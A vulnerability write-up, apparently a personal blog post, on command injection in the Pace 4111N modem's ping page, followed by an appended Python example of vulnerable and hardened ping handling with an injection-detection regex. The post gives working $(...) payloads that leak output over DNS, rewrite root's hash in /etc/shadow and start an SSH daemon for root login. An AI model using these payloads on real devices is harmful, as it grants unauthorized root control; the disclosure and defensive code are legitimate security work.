Pace 4111N Privilege Escalation Vulnerability 2016-11-14

This is probably coming a bit late. I wanted to make sure the vendor and my former ISP (I moved) had ample time to patch this.

Last I recall, the patch had not rolled out. I let them know well over a year ago.

The Pace 4111N is a DSL modem. It runs Linux. It gives you not-quite unlimited access from a password written on a sticker on the unit itself. In my case, it was rented from Sonic.net. I believe that firmware 9.5.1.53.1 is affected, and possibly later versions.

For whatever reason, I wanted more access. I no longer have the modem, just memories and notes on it. So, bear with me.

Perusing the various "utilities" of the web interface ( http://192.168.42.1/ ), I came across the "ping" interface: http://192.168.42.1/xslt?PAGE=C_5_4

Something curious inside me tried the following as the host to ping: $(echo go-beyond.org) . It worked. $(echo localhost) would ping 127.0.0.1, and so forth.

What I found was that I only got output from the ping command, and nothing else. That output was pretty much just limited to whatever IP address I put in, or it tried to resolve.

Anyway, this had me thinking. At one point, I pointed the modem to use 192.168.42.105 as the DNS resolver. That way, I could see the command output as DNS queries, more or less. It turns out, hostnames are pretty picky. I had to use tr and get rid of un-DNSable characters from the output. This might look like $(whoami) and I would see ? A root in tcpdump on my laptop.

At some point, I figured out that /mnt/web/ui/icons/ mapped to http://192.168.42.1/icons/ .

tmpfs to the rescue! $(mount -t tmpfs tmpfs /mnt/web/ui/icons)

And you can verify this over DNS:

$(mount | grep tmpfs | tail -n 1 | tr -d " ")

And look at running processes

$(ps auxf > /mnt/web/ui/icons/tmp.txt) , so I checked http://192.168.42.1/icons/tmp.txt

And it worked!

Now, fuller root with some logging in case it doesn't work.

# Give it our hash: openssl passwd -crypt "password" $(sed -i s/1VbtpZPngOWf2/lobwLmuIgWIHo/ /etc/shadow > /mnt/web/ui/icons/tmp.txt)

And start dropbear... $(dropbear_startup & echo 127.0.0.1; true)

Unfortunately, that seems to break our ping interface. Not sure why. Oh well.

ssh root@192.168.42.1 , your password is password. This seems to last until reboot, but no guarantees.

I believe Pace has fixed this and I bugged Sonic.net many times about rolling out the fix.

To be clear, this is nothing magical. It just gives you more access to your modem if you already have user level access. Might be able to use it in some clever way, but it's mostly relevant for poking around and having fun on your modem. If you have this as a rented modem, your ISP may not want you to do so.

Moral of the story: Don't allow shell injection from your web applications. And ideally, don't run them as root in this case.
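To make the moral concrete, here is an added example (my own code, not the post's or Pace's): the string-building pattern that makes a ping form injectable, next to the hardened form that allow-lists the target and hands an argv list straight to the binary with no shell. The function names, the hostname regex and the sample inputs are mine.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname labels: letters, digits and hyphens, no leading or
# trailing hyphen, 63 chars per label. Constructed allow-list for this
# example, not the modem's own validation.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def vulnerable_ping_command(host: str) -> str:
    """The bug pattern from the post: the form field is spliced into a
    shell command line, so the shell expands $(...) before ping runs,
    as whatever user the web UI runs as (root on the 4111N)."""
    return f"ping -c 3 {host}"


def looks_like_injection(value: str) -> bool:
    """Deny-list check, useful for logging and alerting on submitted
    form values. It is NOT the fix; the allow-list below is."""
    return bool(re.search(r"[$`;|&\n<>]", value))


def is_valid_target(host: str) -> bool:
    """Allow-list: an IPv4/IPv6 literal or an RFC 1123 hostname."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(host) is not None


def safe_ping_argv(host: str) -> list[str]:
    """Hardened form: validate, then build an argv list. With no shell
    involved there is no word splitting or command substitution. The
    '--' is belt and braces against a target parsed as an option; the
    allow-list already rejects a leading hyphen."""
    if not is_valid_target(host):
        raise ValueError(f"rejected ping target: {host!r}")
    return ["ping", "-c", "3", "--", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    # shell=False is the default when argv is a list. Run the web UI, and
    # therefore this, as an unprivileged user rather than root.
    return subprocess.run(safe_ping_argv(host), capture_output=True,
                          text=True, timeout=15)
```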